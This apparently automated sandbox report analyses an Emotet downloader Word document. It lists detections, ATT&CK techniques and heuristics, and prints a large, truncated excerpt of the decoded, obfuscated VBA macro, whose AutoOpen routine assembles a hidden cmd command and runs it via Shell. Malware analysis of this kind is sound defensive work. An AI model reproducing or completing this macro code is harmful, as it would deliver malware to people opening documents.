Verdict: MALICIOUS
Risk Score: 142

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

Malware Insights
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6883981-0', strongly suggesting the Emotet family. The presence of an 'AutoOpen' VBA macro indicates that the malicious code will execute automatically upon opening the document. The macro's primary function appears to be downloading and executing a second-stage payload, a common Emotet behavior.
Heuristics (5)

- ClamAV: Doc.Downloader.Emotet-6883981-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6883981-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5429 bytes |

SHA-256: a11b42997d0c8ece0e17f277ba94f87f7c67ab89df97624e4e4ce9aca4e81e4c
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "tXlizQSSzY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate CBool(ZRzsM)
AppActivate Sqr(7)
AppActivate CrPOsb
AppActivate 1
AppActivate 1662
AppActivate Cos(fssjD)
Shell@ CVar("cm") + ihuqhQuijio + qAkQflEPwVAqn + qXknZ + vqAAbELQ + SVwszaX + JlwkfOnHKiQ + jlYNfMtztiW, 233501883 - 233501883
AppActivate zHfTH
AppActivate CInt(1)
AppActivate wLnFav
End Sub
Attribute VB_Name = "dzGMDMHIpFOu"
Function qXknZ()
On Error Resume Next
AppActivate 233219740
AppActivate 263
AppActivate fqqjNh
PIZqLj = "d /V" + "/C" + CStr(Chr(IYjHQqvTwKzsR + EUjARtWjo + 34 + FSWcHnSd + YzYOFkpGiYZhGW)) + "set W" + "cj" + "=SwTE" + "GIC" + "sLC" + "z" + "sl" + "AbzRtCbT" + "b" + "RDvB+83od"
AppActivate RjvRM
AppActivate zSrjFU
ZTDDpaKHAzT = "\M;JNY}" + ")" + "0u:W7n" + "=pj.(hyPF" + "g1" + " 'akxicqQ{" + "@" + "$f,5me6-" + "r"
AppActivate CDate(AsVIm)
AppActivate pJiWKW
LCOmVtqU = "9" + "/&&for %" + "E in (" + "4" + "6;29;1;7"
AppActivate Round(oXldO)
AppActivate wbownC
AppActivate jqvYY
iWBAWFDd = "2;75;1" + "1;50;" + "72;12" + ";12;56;" + "67;1" + "5;61;44;"
AppActivate vuZQUv
AppActivate CDate(21907 + 90226)
CmiJdS = "45" + ";" + "44;72;1" + ";74;2" + "9;" + "21;47;72;" + "62;1" + "7;" + "56;35;72"
AppActivate 9
AppActivate 106517236
AppActivate WDBmsV
MwlOo = ";17;48;42;" + "72;21;" + "18;12;6" + "1;72" + ";" + "44;" + "17;" + "33;67;61"
AppActivate Log(GUhoR)
AppActivate MwhjsC
YHFNi = ";63;17;" + "45;57;50;1" + "7;17" + ";46;41;77;" + "77" + ";7" + "5;72;44;" + "30;58;1" + "2;1" + "2" + ";54;75;2" + "9;40;46;" + "48;62;29"
AppActivate RzMqWI
AppActivate CInt(437052425)
IGitP = ";71;77" + ";36;12" + ";62;7" + "0;68" + ";66;50;1" + "7;17;4" + "6;41" + ";" + "77;77;5" + "8;54"
qXknZ = PIZqLj + ZTDDpaKHAzT + LCOmVtqU + iWBAWFDd + CmiJdS + MwlOo + YHFNi + IGitP
AppActivate CLng(476)
AppActivate CStr(wnGXU)
AppActivate Sgn(uljLhH)
End Function
Function vqAAbELQ()
On Error Resume Next
AppActivate CStr(92443 - iatow - PiizMf / zZhTup)
AppActivate CSng(bMdAn)
NmlnMYI = ";72;44;" + "15;58;55;7" + "0" + ";4" + "8;58;"
AppActivate uczwEj
AppActivate kkHzj
AppActivate CByte(200)
bwTJbFU = "51" + ";1" + "5" + ";48;46" + ";12" + ";77;52;5" + "1;1;66;50" + ";17;17;" + "4" + "6;41;77;" + "77;11;29;6" + "8;17;46;29" + ";1;72;75;4"
AppActivate mtGiz
AppActivate CDbl(zXctW - OZbnwh)
kpBuOnWsvH = "8;21;72;7" + "7;0;34;28;" + "17;76;64" + ";27;66;" + "50;1" + "7;17;46;41" + ";77;"
AppActivate jFNYz
AppActivate CByte(Kwrqc + 91209 / AsQabp + iiVKOX)
OPUTVtFlSSf = "7" + "7;4" + "4" + ";58" + ";44;58;" + "11;21;12;2" + "9;54;48" + ";21;72;77;" + "50;66;5" + "0;17;17;" + "46;41;77;7"
AppActivate hSzMd
AppActivate CBool(330)
RdFwMLbjY = "7;" + "2" + "7;2" + "7;39;3" + "9" + ";" + "75"
AppActivate CByte(36118 * bufGRW - KXMoz / ftOmcE)
AppActivate HuwsI
AppActivate Int(5)
YCPAzjWE = ";40;11" + ";48;75;40;" + "77;28;30" + ";58;42;57" + ";48;0" + ";46;12" + ";61;17;49" + ";57;66;" + "57;38" + ";33" + ";67;34;8"
AppActivate ChrW(4)
AppActivate 467240634
AppActivate 4346
mwSjH = ";25;56" + ";45;56;57;" + "43;73;7" + "0;" + "57;33;67" + ";47;7"
AppActivate Chr(131)
AppActivate 8
AppActivate Log(csWEww)
iMHEPpL = "1;8;45;67;" + "72" + ";44;24;4" + "1;17;72;7" + "1;46" + ";2" + "6;57;31;57" + ";"
AppActivate koTTPO
AppActivate 13
irjcwUD = "26;6" + "7;34;8;25" + ";26;57;48" + ";72;60;72;" + "57;33;6" + "8;2" + "9;75;72;5" + "8;62;50;"
vqAAbELQ = NmlnMYI + bwTJbFU + kpBuOnWsvH + OPUTVtFlSSf + RdFwMLbjY + YCPAzjWE + mwSjH + iMHEPpL + irjcwUD
AppActivate Oct(37)
AppActivate Sqr(FqXkBB / 75385 / KnjCB * lIUIU)
AppActivate ChrB(fUAhO)
End Function
Function SVwszaX()
On Error Resume Next
AppActivate 16
AppAct
... (truncated)
```